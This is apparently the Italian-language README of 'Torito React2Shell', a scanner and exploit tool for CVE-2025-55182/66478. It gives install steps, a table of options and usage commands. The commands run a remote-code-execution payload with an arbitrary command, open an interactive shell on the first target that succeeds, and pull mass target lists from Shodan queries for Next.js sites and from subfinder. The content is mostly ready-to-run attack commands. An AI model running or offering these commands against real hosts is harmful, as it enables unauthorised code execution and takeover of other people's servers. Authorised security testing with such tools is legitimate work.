
Torito React2Shell Scanner e strumento di exploit (CVE-2025-55182 / 66478)
pip install -r requirements.txtPATH per --subfinder (installazione tramite Homebrew brew install subfinder o Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; progetto: https://github.com/projectdiscovery/subfinder)pip install shodan (già nei requisiti) e una chiave: export SHODAN_API_KEY=... con crediti di query disponibilipython3 torito_r2s.py --help
Sonda sicura (singolo target)
python3 torito_r2s.py -u https://target.com
Conferma PoC (redirect su canale laterale)
python3 torito_r2s.py -u https://target.com --confirm
Exploit con comando personalizzato
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"
Shell interattiva al primo successo
python3 torito_r2s.py -u https://target.com --shell
Scansione da lista con esportazioni
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv
Solo Shodan (richiede chiave e crediti)
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm
Solo Subfinder
python3 torito_r2s.py --subfinder target.com --confirm
Proxy (Burp/Caido)
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm
Pipeline tramite stdin
cat urls.txt | python3 torito_r2s.py --confirm
--exploit-cmd o --shell.| Opzione | Descrizione | Predefinito |
|---|
-u, --url URL | URL di un singolo target | — |
-l, --list FILE | File con i target (uno per riga) | — |
--subfinder DOMAIN | Esegui subfinder per il dominio e aggiungi i risultati | — |
--shodan QUERY | Ricerca Shodan (richiede SHODAN_API_KEY con crediti) | — |
--shodan-limit N | Numero massimo di risultati Shodan per query | 100 |
-t, --threads N | Concorrenza | 20 |
--timeout SEC | Timeout delle richieste | 10 |
--proxy URL | Proxy HTTP/HTTPS | — |
--confirm | Esegui il PoC basato su redirect dopo la sonda | disattivato |
--exploit-cmd "CMD" | Esegui il payload RCE con il comando | — |
--shell, -i | Apri una shell interattiva al primo exploit riuscito (il comando predefinito è id) | disattivato |
--json-out FILE | Salva i risultati in JSON | — |
--csv-out FILE | Salva i risultati in CSV | — |
-v, --verbose | Mostra output/digest decodificati nella tabella | disattivato |